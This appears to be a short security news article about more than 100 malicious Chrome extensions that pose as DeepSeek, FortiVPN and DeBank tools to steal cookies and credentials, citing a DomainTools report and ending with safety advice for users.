Why trust Greenbot
Over 100 deceptive Chrome browser extensions with dual functionality have compromised user security since February 2024, stealing credentials and manipulating web traffic while appearing legitimate.
Security researchers reported that a sophisticated threat actor has created fake websites impersonating popular services like DeepSeek AI, FortiVPN, and DeBank to trick users into installing malicious Chrome extensions. These extensions provide some advertised functions while secretly executing harmful code that can access cookies, passwords, and inject ads.
“The actor creates websites that masquerade as legitimate services to direct users to install corresponding malicious extensions,” according to a report from DomainTools Intelligence released this month.
The extensions request excessive permissions, allowing them to access all websites a user visits. They also employ technical tricks to bypass Chrome’s security protections.
“Extensions impersonating DeepSeek redirected users providing low ratings to a private feedback form while sending high ratings to the official Chrome Web Store review page,” the DomainTools report noted. This tactic helps the fake extensions maintain good ratings.
Google has removed several extensions, but many remain available due to detection delays. The threat persists because extensions use clever methods to hide their real purpose during Google’s review process.
Security experts identified a common pattern in how these extensions operate. After installation, they connect to attacker-controlled domains with names like “api.sprocketwhirl.top“. These connections let hackers send commands and receive stolen information.
The malicious code typically hides in files named “background.js” or “background.iife.js.” These files contain functions that can steal browser cookies, which might lead to account takeovers across various websites.
Hackers distribute these fake extensions through Facebook and other Meta platforms. They create convincing copies of real tools that partially work as promised, making them harder to spot as dangerous.
To stay safe, users should carefully check what permissions extensions ask for before installing them. Stick to extensions from known developers with good track records, and regularly check what extensions you have installed. Any extension requesting access to all websites or browser data deserves extra scrutiny.
Security researchers continue tracking these malicious extensions, but the delay between their distribution and detection means users must remain vigilant when installing browser add-ons.
